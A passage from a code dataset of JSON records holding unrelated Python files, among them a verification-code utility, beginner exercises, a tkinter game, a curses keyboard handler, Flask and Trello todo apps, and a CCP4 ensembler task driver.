IVerificationCodeUtility(Interface):\n    \n    def generate(self, order):\n        \"\"\"\n        \"\"\"\n\n    def is_unique(self, context, verification_code):\n        \"\"\"\n        \"\"\"\n\n    def add(self, verification_code, order):\n        \"\"\"\n        \"\"\"\n\n\nclass VerificationCodeUtility(Persistent):\n    
implements(IVerificationCodeUtility)\n\n def __init__(self):\n self._verification_codes = IIBTree()\n\n def generate(self, order):\n verification_code = random.randint(LOWER, UPPER)\n count = 0\n while not self.is_unique(verification_code) and count < RETRIES:\n count += 1\n verification_code = random.randint(LOWER, UPPER)\n\n if count > RETRIES - 1:\n raise Exception('Could not find unique verification code.')\n \n self.add(verification_code, order)\n return str(verification_code)\n \n def is_unique(self, code):\n if code in self._verification_codes.keys():\n return False\n else:\n return True\n\n def add(self, verification_code, order):\n order_id = order.getId()\n if not isinstance(order_id, IntType):\n order_id = int(order_id)\n\n self._verification_codes[verification_code] = order_id\n","sub_path":"emas/app/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"653758476","text":"'''\nTake two numbers from the user, one representing the start and one the end of a sequence.\nUsing a loop, sum all numbers from the first number through to the second number.\n\nFor example, if a user enters 1 and 100, the sequence would be all integer numbers from 1 to 100.\nThe output of your calculation should therefore look like this:\n\nThe sum is: 5050\n'''\nstartnum = int(input(\"Start of number sequence: \"))\nendnum = int(input(\"End of number sequence: \"))\n\nsum = 0\n\nfor n in range(startnum,endnum+1):\n sum += n\n\nprint(f\"Sum of sequence is {sum}\")\n","sub_path":"labs/04_conditionals_loops/04_05_sum.py","file_name":"04_05_sum.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"15000194","text":"## GLOBALS / CONSTANTS ##\nPCA_N_COMPONENTS = 100\nMLP_ID = 1\nSVM_ID = 2\nNO_MATCH = \"no_match\"\nDEBUG = True\nUSE_CACHED_MODEL = False\nSMALL_MODEL = True\nSMILE_DATASET_PATH = \"data/smile_home\"\nSMALL_DATA_PATH = \"data/smile_home\"\nPREPROCESSOR_CACHE_PATH = \"data/preprocessor_cache\"\n\nBEST_SMALL_MODEL = {'hidden_layer_sizes':(2,1), 'alpha':1.1, 'beta_1':0.9, 'learning_rate':'constant', 'max_iter':3000, 'batch_size': 80}\nBEST_MODEL = {'hidden_layer_sizes':(20,8), 'alpha':1.1, 'beta_1':0.9, 'learning_rate':'constant', 'max_iter':3000, 'batch_size': 80}\n\n## these are supposed to be standard dimensions of img\n## not sure if discrepency actually affects things\n## or if i can just brute resize everything either\nprocessed_width = 100\nprocessed_height = 100\n\nconfig = {\n 'h' : 250,\n 'w' : 250,\n 'min_faces' : 10,\n 'aspect_ratio' : 0.4\n }\n\ndef setup_config(h = 250, w = 250, min_faces = 70, aspect_ratio = 0.4):\n config['h'] = h\n config['w'] = w\n config['min_faces'] = min_faces\n config['aspect_ratio'] = aspect_ratio\n","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"337502357","text":"from tkinter import *\r\n\r\nimport random\r\nimport winsound\r\n\r\nclass World:\r\n def __init__(self, master):\r\n self.master = master\r\n master.title(\"Squares class\")\r\n\r\n self.board = Frame(master)\r\n self.board.pack()\r\n\r\n self.canvas = Canvas(self.board, width=500, height=500, bg='black')\r\n self.canvas.pack(side=LEFT)\r\n\r\n self.left_coords = 125, 50, 175, 100\r\n self.right_coords = 325, 50, 375, 100\r\n 
self.side = self.left_coords, self.right_coords\r\n\r\n        self.obj_coords = random.choice(self.side)\r\n        self.obj = self.canvas.create_rectangle(self.obj_coords, fill='red')\r\n        self.obj_coords = self.canvas.coords(self.obj)\r\n\r\n        self.char = self.canvas.create_rectangle(125,400, 175,450, fill='green')\r\n\r\n        self.info = Label(self.board, width=40, height=20, bg='black', fg='red', font='Courier',\r\n                          text=\"Press Start button to start\")\r\n        self.info.pack()\r\n\r\n        self.score = 0\r\n\r\n        self.canvas.focus_set()\r\n        self.canvas.bind(\"<Left>\", self.move_left)\r\n        self.canvas.bind(\"<Right>\", self.move_right)\r\n        \r\n        self.start_button = Button(self.board, text=\"Start\",\r\n                                   width=10, height=2,\r\n                                   bg='black', fg='red', font=\"Courier\",\r\n                                   cursor=\"hand2\", command=self.start)\r\n        self.start_button.pack()\r\n\r\nclass Motor(World):\r\n    def move_left(self, event):\r\n        char_coords = 125,400, 175,450\r\n        self.canvas.coords(self.char, char_coords)\r\n\r\n    def move_right(self, event):\r\n        char_coords = 325,400, 375,450\r\n        self.canvas.coords(self.char, char_coords)\r\n\r\n    def move(self):\r\n        try:\r\n            if self.obj_coords == [125.0, 500.0, 175.0, 550.0] or self.obj_coords == [325.0, 500.0, 375.0, 550.0]: #bottom\r\n                winsound.Beep(1000, 100)\r\n                self.score += 10\r\n                score_text = \"+10 points!\" + \"\\n\" + \"Total score: \" + str(self.score)\r\n                self.info.config(text=score_text)\r\n                self.obj_coords = random.choice(self.side)\r\n                self.canvas.coords(self.obj, self.obj_coords)\r\n                self.move()\r\n\r\n            elif self.canvas.coords(self.obj) == self.canvas.coords(self.char): #clash\r\n                winsound.Beep(1000, 500)\r\n                self.start_button.config(text=\"Restart\", command=self.restart)\r\n                clash_text = \"Oops! you got hit! \\n Total score: \" + str(self.score) + \"\\n Press Restart button to restart game\"\r\n                self.info.config(text=clash_text)\r\n                clash_coords = self.canvas.coords(self.obj)\r\n                self.canvas.delete(ALL)\r\n                self.canvas.create_rectangle(clash_coords, fill=\"blue\")\r\n\r\n            else: #keep moving\r\n                winsound.Beep(800, 100)\r\n                self.obj_coords = [self.obj_coords[0], self.obj_coords[1]+50, self.obj_coords[2], self.obj_coords[3]+50]\r\n                self.canvas.coords(self.obj, self.obj_coords)\r\n                self.after_id = root.after(25, self.move)\r\n        except:\r\n            pass\r\n\r\n    def start(self):\r\n        self.start_button.config(text=\"Pause\", command=self.pause)\r\n        self.move()\r\n\r\n    def pause(self):\r\n        print(\"Paused\")\r\n        if getattr(self, \"after_id\", None) is not None: # only cancel if a move is actually scheduled\r\n            root.after_cancel(self.after_id)\r\n        self.start_button.config(text=\"Start\", command=self.start)\r\n\r\n    def restart(self):\r\n        self.master.destroy()\r\n        master = Tk()\r\n        game = All(master)\r\n\r\n\r\nclass All(Motor, World):\r\n    pass\r\n    \r\n\r\nroot = Tk()\r\n\r\ngame = All(root)\r\n","sub_path":"Squares class separate classes.py","file_name":"Squares class separate classes.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"470738163","text":"\"\"\"\nCurses keyboard handling.\n\nTo test keyboard response, run `python -m tbl.curses_keyboard`; press q to exit.\n\"\"\"\n\n#-------------------------------------------------------------------------------\n\nimport curses\nimport logging\nimport os\nimport time\n\n#-------------------------------------------------------------------------------\n\nESC = 27\n\nKEYS = {\n    0: \"C-SPACE\",\n    1: \"C-a\",\n    2: \"C-b\",\n    3: \"C-c\",\n    4: \"C-d\",\n    5: \"C-e\",\n    6: \"C-f\",\n    7: \"C-g\",\n    9: \"TAB\",\n    10: \"RETURN\",\n    11: \"C-k\",\n    12: \"C-l\",\n    
14: \"C-n\",\n 15: \"C-o\",\n 16: \"C-p\",\n 17: \"C-q\",\n 18: \"C-r\",\n 19: \"C-s\",\n 20: \"C-t\",\n 21: \"C-u\",\n 22: \"C-v\",\n 23: \"C-w\",\n 24: \"C-x\",\n 25: \"C-y\",\n 26: \"C-z\",\n 27: \"ESC\",\n 32: \"SPACE\",\n 258: \"DOWN\",\n 259: \"UP\",\n 260: \"LEFT\",\n 261: \"RIGHT\",\n 262: \"HOME\",\n 265: \"F1\",\n 266: \"F2\",\n 267: \"F3\",\n 268: \"F4\",\n 269: \"F5\",\n 270: \"F6\",\n 271: \"F7\",\n 272: \"F8\",\n 273: \"F9\",\n 274: \"F10\",\n 275: \"F11\",\n 276: \"F12\",\n 330: \"DELETE\",\n 338: \"PAGEDOWN\",\n 339: \"PAGEUP\",\n 343: \"ENTER\",\n 360: \"END\",\n 393: \"S-LEFT\",\n 402: \"S-RIGHT\",\n\n curses.KEY_BACKSPACE: \"BACKSPACE\",\n} \n\nMETA_KEYS = {\n 98: \"M-LEFT\", # M-b\n 102: \"M-RIGHT\", # M-f \n}\n\ndef get_key(stdscr, interval=0.01):\n while True:\n meta = False\n c = stdscr.getch()\n if c == -1:\n # No character available.\n time.sleep(interval)\n continue\n\n if c == curses.ERR:\n # Not sure why we get these.\n continue\n\n if c == curses.KEY_RESIZE:\n sy, sx = stdscr.getmaxyx()\n return \"RESIZE\", (sx, sy)\n elif c == curses.KEY_MOUSE:\n _, x, y, _, state = curses.getmouse()\n # FIXME: Not sure if we have buttons 2/3 right.\n if state & curses.BUTTON1_CLICKED:\n key = \"LEFTCLICK\"\n elif state & curses.BUTTON1_DOUBLE_CLICKED:\n key = \"LEFTDBLCLICK\"\n elif state & curses.BUTTON2_CLICKED:\n key = \"RIGHTCLICK\"\n elif state & curses.BUTTON2_DOUBLE_CLICKED:\n key = \"RIGHTDBLCLICK\"\n elif state & curses.BUTTON3_CLICKED:\n key = \"MIDDLECLICK\"\n elif state & curses.BUTTON3_DOUBLE_CLICKED:\n key = \"MIDDLEDBLCLICK\"\n else:\n # Discard other messages, e.g. press/release.\n continue\n if state & curses.BUTTON_SHIFT:\n key = \"S-\" + key\n if state & curses.BUTTON_ALT:\n key = \"M-\" + key\n # FIXME: OS/X seems to produce press and release events for CTRL\n # mouse clicks, but not clicked events.\n if state & curses.BUTTON_CTRL:\n key = \"C-\" + key\n return key, (x, y)\n\n if c == ESC:\n # This might be an escape sequence. 
Read more.\n c = stdscr.getch()\n if c == -1:\n # Nope; a bare escape.\n return \"ESC\", None\n else:\n meta = True\n\n if meta:\n try:\n return META_KEYS[c], None\n except KeyError:\n pass\n\n try:\n key = KEYS[c]\n except KeyError:\n if 0 <= c < 128:\n key = chr(c)\n else:\n logging.warning(\"unrecognized key code: {}\".format(c))\n\n if meta:\n key = \"M-\" + key\n return key, None\n\n\n\n#-------------------------------------------------------------------------------\n# Testing\n\ndef main():\n os.environ[\"ESCDELAY\"] = \"0\"\n\n stdscr = curses.initscr()\n curses.noecho()\n curses.raw()\n curses.curs_set(False)\n\n # Enable mouse actions.\n curses.mousemask(curses.BUTTON1_CLICKED | curses.BUTTON1_DOUBLE_CLICKED)\n\n stdscr.keypad(True)\n stdscr.nodelay(True)\n stdscr.notimeout(True)\n\n try:\n history = []\n while True:\n key, arg = get_key(stdscr)\n k = \"{!r}, {!r}\".format(key, arg)\n history.append(k)\n if len(history) > 10:\n history.pop(0)\n stdscr.clear()\n for i in range(len(history)):\n stdscr.addstr(i, 2, history[i])\n if key == \"q\" or key == 113:\n break\n finally:\n curses.curs_set(True)\n curses.noraw()\n stdscr.keypad(False)\n curses.echo()\n curses.endwin()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tbl/curses_keyboard.py","file_name":"curses_keyboard.py","file_ext":"py","file_size_in_byte":4739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"372196335","text":"#!/usr/bin/env python\nfrom setuptools import setup, find_packages\nimport tellme_trello\n\n\ndef read_file(name):\n with open(name) as fd:\n return fd.read()\n\nkeywords = ['django', 'web', 'html']\n\nsetup(\n name='tellme-trello',\n version=tellme_trello.__version__,\n description=tellme_trello.__doc__,\n long_description=read_file('README.rst'),\n author=tellme_trello.__author__,\n author_email=tellme_trello.__email__,\n license=tellme_trello.__license__,\n url=tellme_trello.__url__,\n keywords=keywords,\n packages=find_packages(exclude=[]),\n include_package_data=True,\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Environment :: Console',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: BSD License',\n 'Natural Language :: English',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n ],\n)\n","sub_path":"pypi_install_script/tellme-trello-0.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"375408711","text":"# 开发的主要目录, 代码基本都在这个目录中\nimport redis\nimport logging\n\nfrom flask import Flask, render_template, g\nfrom flask_session import Session\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_wtf.csrf import CSRFProtect, generate_csrf\nfrom logging.handlers import RotatingFileHandler\n\n# 创建数据库\n\n\ndb = SQLAlchemy()\n\n# 定义空redis存储对象,供视图调用!\nredis_store = None # type: redis.StrictRedis\n\n\ndef setup_log(config_name):\n # 设置日志的记录等级\n logging.basicConfig(level=config_name.LOG_LEVEL) # 调试debug级\n # 创建日志记录器,指明日志保存的路径、每个日志文件的最大大小、保存的日志文件个数上限\n file_log_handler = RotatingFileHandler(\"logs/log\", maxBytes=1024 * 1024 * 100, backupCount=10)\n # 创建日志记录的格式 日志等级 输入日志信息的文件名 行数 日志信息\n formatter = logging.Formatter('%(levelname)s 
%(filename)s:%(lineno)d %(message)s')\n # 为刚创建的日志记录器设置日志记录格式\n file_log_handler.setFormatter(formatter)\n # 为全局的日志工具对象(flask app使用的)添加日志记录器\n logging.getLogger().addHandler(file_log_handler)\n\n\n# 提供一个函数, 工厂方法, 方便的根据不同的参数, 实现不同的配置加载\ndef create_app(config_name):\n ''' 通过manager 传参,传入的是对象!,对象在setting 之中,对象属性来进行添加属性!\n 两次连接redis 一次连接是为了供视图使用,一次是为了存储session的值\n '''\n # 配置项目日志\n setup_log(config_name)\n\n app = Flask(__name__)\n\n app.config.from_object(config_name)\n\n # 几乎所有的扩展都支持这种创建方式\n db.init_app(app)\n\n # 创建redis对象\n global redis_store\n # 连接redis,返回对象供视图使用! decode_responses 表示将字节码转换成字符串\n redis_store = redis.StrictRedis(host=config_name.REDIS_HOST, port=config_name.REDIS_PORT, decode_responses=True)\n\n # 开启CSRF保护 --> 会启用csrf_token对比机制\n # 1. wtf中有函数可以直接生成\n # 2. 在请求钩子中进行设置\n # 3. ajax可以增加一个字段: headers:(\"X-CSRFToken\")\n # 4. 到时候会自动从cookie中获取csrftoken, 从ajax的参数中获取csrftoken, 然后进行对比\n\n CSRFProtect(app)\n from info.utils.common import user_login_data\n # 所有的请求进行检测,是否有404错误!\n @app.errorhandler(404)\n @user_login_data\n def page_not_found(_):\n user = g.user\n data = {\n \"user_info\": user.to_dict() if user else None\n }\n return render_template('news/404.html', data=data)\n\n # 请求钩子,每次请求都会设置 csrf_token值\n # 在每次请求之后, 生成csrf_token, 设置到cookie中\n @app.after_request\n def after_request(response):\n # token生成后,会缓存起来, 多次生成仍是同一个\n csrf_token = generate_csrf()\n # WTF扩展会自动将corf_token存入session, 然后通过flask-session扩展同步到服务器的redis中\n response.set_cookie('csrf_token', csrf_token)\n return response\n\n # 增加自定义过滤器\n from info.utils.common import do_index_class\n app.add_template_filter(do_index_class, 'index_class')\n\n # 设置Flask-Session扩展.\n # 将存在浏览器的cookie中的session数据, 同步到服务器的指定地址中(redis)\n Session(app)\n\n # 蓝图在用到的时候再导包, 可以当做固定规则\n from info.modules.index import index_blue\n # 注册蓝图对象\n app.register_blueprint(index_blue)\n\n from info.modules.passport import passport_blue\n app.register_blueprint(passport_blue)\n\n from info.modules.profile import profile_blue\n app.register_blueprint(profile_blue)\n\n from info.modules.news import news_blue\n app.register_blueprint(news_blue)\n # 将url_prefix='/admin'设置到这里是说明这个是管理员用户!(可选!)\n from info.modules.admin import admin_blue\n app.register_blueprint(admin_blue, url_prefix='/admin')\n\n return app\n","sub_path":"info/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"252658859","text":"#!/bin/python3\n\n\"\"\"\nProblem: Read two integers and print two lines. The first line should contain integer division a//b. 
The second line should contain float division, a/b.\n- No rounding\n\nInput: First line should have integer a, second line should have integer b.\n\nOutput: Print the two divisions as described above.\n\"\"\"\n\ndef main():\n a = int(input())\n b = int(input())\n\n print(a//b)\n print(a/b)\n\nif __name__ == '__main__': main()\n","sub_path":"Python/introduction/easy/division.py","file_name":"division.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"350426326","text":"import numpy as np\nclass person_details:\n def __init__(self, name, lid_id):\n self.name = name\n self.lid_id = lid_id\n def displayEmployee(self):\n print(\"Name : \", self.name, \", library id: \", self.lid_id)\n def _welcomeMessage(self):\n print(\"\\nGreetings\", self.name, \"this is umkc library!\\n\")\n print(\"your details:\")\n print(\"Name:\", self.name, \"identificatino\", self.lib_id)\nclass location:\n def __init__(self,loc):\n self.loc = loc\n\n def displayaddress(self):\n print(\"Address is: \", self.loc)\nclass info(person_details, location):\n def __init__(self, name, lib_id, loc):\n self.type = \"user\"\n person_details.name = name\n person_details.lib_id = lib_id\n person_details._welcomeMessage(self)\n location.loc = loc\n location.displayaddress(self)\n\nclass Ainfo(person_details, location):\n def __init__(self, name, lib_id, loc):\n self.type = \"admin\"\n #super.__init__(name, 'navi')\n person_details.name = name\n person_details.lib_id = lib_id\n person_details._welcomeMessage(self)\n location.loc = loc\n location.displayaddress(self)\nclass book(object):\n def __init__(self):\n print(\"please enter your book:\")\n book_list = [\"S.no\", \"name of the book\", \"no.of days to return\"]\n row_count = [1, 2, 3]\n self.data = np.array([[1, 'happy', 10],\n [2, 'happy2', 20],\n [3, 'happy3', 30]])\n print(self.data)\n\n def changeList(self, type):\n if(type == \"Admin\"):\n print(\"\\nadmin can one use the books\\n\")\n decision = input(\"add one more:\")\n if(decision.upper() == \"YES\"):\n list = input(\"please enter the name of the book(sno,book, days you needed):\").split(\",\")\n np.append(self.data, list)\n print(np.append(self.data, list))\n else:\n print(\"please try again later\")\n\n\nuser = info('navi','maggi','233')\nb=book()\nadmin = Ainfo('happy','happy', '1234')\nc=book()\n\n#emp1 = person_details(\"z\", 2000)\n\n#emp2 = person_details(\"x\", 5000)\n#emp3= person_details(\"navi\", 7000)\n#emp4 = person_details(\"navi\", 7000)\n#emp1.displayEmployee()\n#emp2.displayEmployee()\n#emp3.displayEmployee()\n\n\n","sub_path":"lab-assignment5/source/managment.py","file_name":"managment.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"413779045","text":"from flask import Flask, render_template, request, redirect, url_for\nimport session_items as session\nimport pprint\nimport trello as t\npp = pprint.PrettyPrinter(indent=4)\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index(): \n items = t.get_items()\n statuses = t.get_app_board_lists()\n return render_template('index.html' , items=items, statuses=statuses)\nif __name__ == '__main__':\n app.run()\n\n# @app.route('/create', methods=['POST'])\n# def create():\n# session.add_item(request.form.get('newItemTitle') )\n# return redirect(url_for('index'), code=302)\n\n@app.route('/create', methods=['POST'])\ndef create():\n 
t.add_item('5f3d5425b0c82d22a3d25f72', request.form.get('newItemTitle'))\n return redirect(url_for('index'), code=302)\n\n@app.route('/view/', methods=['GET'])\ndef view(id):\n item=session.get_item(id)\n return render_template('item.html', item=item)\n\n@app.route('/save', methods=['POST'])\ndef save():\n id=request.form.get( 'itemId' )\n status=request.form.get( 'itemStatus' )\n title=request.form.get( 'itemTitle' )\n print(id)\n print(status)\n print(title)\n t.save_item(id, status, title)\n return redirect(url_for('index'), code=302)\n \n@app.route('/sort/', methods=['GET'])\ndef sort_items(sortType):\n unsorted_items = session.get_items()\n pp.pprint(unsorted_items)\n sorted_items = sorted(unsorted_items, key=lambda item: item[str(sortType)].upper())\n pp.pprint(sorted_items)\n return render_template('index.html' , items=sorted_items) \n\n@app.route('/delete/', methods=['POST'])\ndef delete(id):\n print(t.get_item(id))\n t.delete_item(id)\n return redirect(url_for('index'), code=302)\n\n@app.route('/complete_item/', methods=['POST'])\ndef complete_item(id):\n #session.delete_item(id)\n return redirect(url_for('index'), code=302)","sub_path":"todo-app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"375419125","text":"##!/usr/bin/python\n\n#\n# ============================================================================\n#\n# 16.11.17 <-- Date of Last Modification.\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# ----------------------------------------------------------------------------\n#\n# ENSEMBLEPREPXYZ EXECUTABLE MODULE\n#\n# Command-line:\n# ccp4-python -m pycofe.tasks.ensembleprepxyz exeType jobDir jobId\n#\n# where:\n# exeType is either SHELL or SGE\n# jobDir is path to job directory, having:\n# jobDir/output : directory receiving output files with metadata of\n# all successful imports\n# jobDir/report : directory receiving HTML report\n#\n# Copyright (C) Eugene Krissinel, Andrey Lebedev 2017\n#\n# ============================================================================\n#\n\n# python native imports\nimport os\nimport sys\nimport shutil\n\n# ccp4-python imports\nimport pyrvapi\n\n# application imports\nimport basic\nfrom pycofe.proc import analyse_ensemble, coor\nfrom pycofe.dtypes import dtype_template, dtype_sequence\n\n\n# ============================================================================\n# Make Ensembler driver\n\nclass EnsemblePrepXYZ(basic.TaskDriver):\n\n # redefine name of input script file\n def file_stdin_path(self): return \"ensembler.script\"\n\n # make task-specific definitions\n def gesamt_report (self): return \"gesamt_report\"\n\n # ------------------------------------------------------------------------\n\n def run(self):\n\n # Prepare ensembler input\n # fetch input data\n\n seq = None\n if hasattr(self.input_data.data,\"seq\"): # optional data parameter\n seq = self.makeClass ( self.input_data.data.seq[0] )\n\n xyz = self.input_data.data.xyz\n\n # Just in case (of repeated run) remove ensemble output xyz file. 
When\n # ensembler succeeds, this file is created.\n\n if not self.outputFName:\n if seq:\n self.outputFName = os.path.splitext(seq.files[0])[0]\n else:\n self.outputFName = os.path.splitext(xyz[0].files[0])[0]\n\n outputFile = self.getXYZOFName()\n\n if os.path.isfile(outputFile):\n os.remove ( outputFile )\n\n if len(xyz)>1:\n\n # make a file with input script\n self.open_stdin()\n\n self.write_stdin (\n \"input\" +\\\n \"\\n{\"\n )\n\n for i in range(len(xyz)):\n xyz[i] = self.makeClass ( xyz[i] )\n fpath = xyz[i].getFilePath ( self.inputDir() )\n if xyz[i].chainSel != \"(all)\":\n base, ext = os.path.splitext ( xyz[i].getFileName(0) )\n fpath_sel = base + \"_\" + xyz[i].chainSel + ext\n coor.fetchChains ( fpath,-1,[xyz[i].chainSel],True,True,fpath_sel )\n self.write_stdin ( \"\\nmodel = \" + fpath_sel )\n else:\n self.write_stdin ( \"\\nmodel = \" + fpath )\n #xyz[i].chainSel\n\n output_style = \"merged\"\n #if len(xyz)==1:\n # fcopy = os.path.join(self.inputDir(),\"X_X_\" + xyz[0].getFileName())\n # shutil.copy2 ( xyz[0].getFilePath(self.inputDir()),fcopy )\n # self.write_stdin ( \"\\nmodel = \" + fcopy )\n # output_style = \"separate\"\n\n self.write_stdin (\n \"\\n}\" +\\\n \"\\noutput\" +\\\n \"\\n{\" +\\\n #\"\\nlocation = \" + \"./\" +\\ -- not needed, will write to current directory\n \"\\nroot = ensemble\"+\\\n \"\\nstyle = \" + output_style +\\\n \"\\nsort = input\" +\\\n \"\\n}\" +\\\n \"\\nconfiguration\" +\\\n \"\\n{\" +\\\n \"\\nsuperposition\" +\\\n \"\\n{\" +\\\n \"\\nmethod = \" + self.getParameter(self.task.parameters.sec1.contains.SUPERPOSITION_SEL,False) +\\\n \"\\nconvergence = \" + self.getParameter(self.task.parameters.sec2.contains.SUPCONV,False) +\\\n \"\\n}\" +\\\n \"\\nmapping = \" + self.getParameter(self.task.parameters.sec1.contains.MAPPING_SEL,False) +\\\n \"\\natoms = \" + self.getParameter(self.task.parameters.sec2.contains.ATOMNAMES,False) +\\\n \"\\nclustering = \" + self.getParameter(self.task.parameters.sec2.contains.CLUSTDIST,False) +\\\n \"\\nweighting\" +\\\n \"\\n{\" +\\\n \"\\nscheme = \" + self.getParameter(self.task.parameters.sec1.contains.WEIGHTING_SEL,False) +\\\n \"\\nconvergence = \" + self.getParameter(self.task.parameters.sec2.contains.WEIGHTCONV,False) +\\\n \"\\nincremental_damping_factor = \" + self.getParameter(self.task.parameters.sec2.contains.WEIGHTDFACTOR,False) +\\\n \"\\nmax_damping_factor = \" + self.getParameter(self.task.parameters.sec2.contains.WEIGHTMAXDFACTOR,False) +\\\n \"\\n\" + self.getParameter(self.task.parameters.sec1.contains.WEIGHTING_SEL,False) +\\\n \"\\n{\\n\" +\\\n \"\\ncritical = \" + self.getParameter(self.task.parameters.sec1.contains.RRCRITICAL,False) +\\\n \"\\n}\" +\\\n \"\\n}\" +\\\n \"\\ntrim = \" + self.getParameter(self.task.parameters.sec1.contains.TRIM_SEL,False) +\\\n \"\\ntrimming\" +\\\n \"\\n{\" +\\\n \"\\nthreshold = \" + self.getParameter(self.task.parameters.sec1.contains.TTHRESH,False) +\\\n \"\\n}\" +\\\n \"\\n}\\n\"\n )\n\n self.close_stdin()\n\n # Start ensembler\n self.runApp ( \"phaser.ensembler\",[\"--stdin\"] )\n\n #if len(xyz)==1:\n # for file in os.listdir(\".\"):\n # if file.startswith(\"ensemble_X_X_\"):\n # os.rename ( file,outputFile )\n # break\n os.rename ( \"ensemble_merged.pdb\",outputFile )\n\n else:\n # single xyz dataset on input\n xyz0 = self.makeClass ( xyz[0] )\n fpath = xyz0.getFilePath ( self.inputDir() )\n coor.fetchChains ( fpath,-1,[xyz0.chainSel],True,True,outputFile )\n #if xyz0.chainSel != \"(all)\":\n # coor.fetchChains ( 
fpath,-1,[xyz0.chainSel],True,True,outputFile )\n #else:\n # coor.fetchChains ( fpath,-1,['(all)'],True,True,outputFile )\n # os.rename ( fpath,outputFile )\n\n if os.path.isfile(outputFile):\n\n temp = dtype_template.DType ( self.job_id )\n for c in xyz:\n temp.addSubtypes ( c.subtype )\n ensemble = self.registerEnsemble ( temp.subtype,outputFile,checkout=True )\n if ensemble:\n if seq:\n ensemble.putSequence ( seq )\n self.putTitle ( \"Results\" )\n if len(xyz)>1:\n self.putSection ( self.gesamt_report(),\"Structural alignment\" )\n analyse_ensemble.run ( self,self.gesamt_report(),ensemble )\n else:\n ensemble.meta = None\n ensemble.rmsd = 1.0 # just to put in something\n self.putMessage (\n \"
Generated single-model ensemble (\" +\\\n                    str(ensemble.xyzmeta[\"xyz\"][0][\"chains\"][0][\"size\"]) +\\\n                    \" residues)\" )\n\n                if not seq:\n                    self.dataSerialNo += 1\n                    seq = dtype_sequence.DType ( self.job_id )\n                    seq.setFile ( \"(unknown)\" )\n                    seq.makeDName ( self.dataSerialNo )\n                    seq.files = [] # no files associated with unknown sequence\n                    seq.setSubtype ( \"unknown\" )\n                    self.outputDataBox.add_data ( seq )\n                    self.putMessage ( \"Associated with auto-generated \" +\\\n                                      \"unknown sequence: \" +\\\n                                      seq.dname + \" \" )\n                else:\n                    self.putMessage ( \"Associated with sequence: \" +\\\n                                      seq.dname + \"
 \" )\n\n self.putEnsembleWidget ( \"ensemble_btn\",\"Coordinates\",ensemble )\n ensemble.addDataAssociation ( seq.dataId )\n ensemble.sequence = seq\n if len(seq.files)>0:\n ensemble.files += [seq.files[0]]\n os.rename ( os.path.join(self.inputDir() ,seq.files[0]),\n os.path.join(self.outputDir(),seq.files[0]) )\n else:\n ensemble.setSubtype ( \"sequnk\" )\n\n else:\n self.putTitle ( \"No ensembles were made\" )\n self.fail ( \"\",\"No ensemblies made\" )\n return\n\n # close execution logs and quit\n\n # apparently log parser completes action when stdout is closed. this\n # may happen after STOP_POLL is issued, in which case parser's report\n # is not seen until the whole page is reloaded.\n # is there a way to flush generic parser at some moment?\n import time\n time.sleep(1)\n\n self.success()\n return\n\n\n# ============================================================================\n\nif __name__ == \"__main__\":\n\n drv = EnsemblePrepXYZ ( \"\",os.path.basename(__file__) )\n drv.start()\n","sub_path":"pycofe/tasks/ensembleprepxyz.py","file_name":"ensembleprepxyz.py","file_ext":"py","file_size_in_byte":9693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"571226366","text":"def fact(n):\n\tn=n\n\ta=1\n\twhile (n>1):\n\t\ta=a*n\n\t\tn=n-1\n\treturn (a)\n\nx=\"y\"\nwhile(x==\"y\"):\n\tn=int(input(\"Dame un numero\"))\n\tf=fact(n)\n\twhile (n<0):\n\t\tn=int(input(\"error dame un numero positivo\"))\n\t\tf=fact(n)\n\tprint(\"El factorial de tu numero es:\",f)\n\tx=int(input(\"Quieres intentar otro numero? 1=si, 2=no:\"))\n\twhile (x!=1 and x!=2):\n\t\tprint (\"Error\")\n\t\tx=int(input(\"Quieres intentar otro numero? 1=si, 2=no:\"))\n","sub_path":"factorial.py","file_name":"factorial.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"20655202","text":"\n\n#calss header\nclass _TORONTO():\n\tdef __init__(self,): \n\t\tself.name = \"TORONTO\"\n\t\tself.definitions = [u'the largest city in Canada, and the capital of the province of Ontario']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn 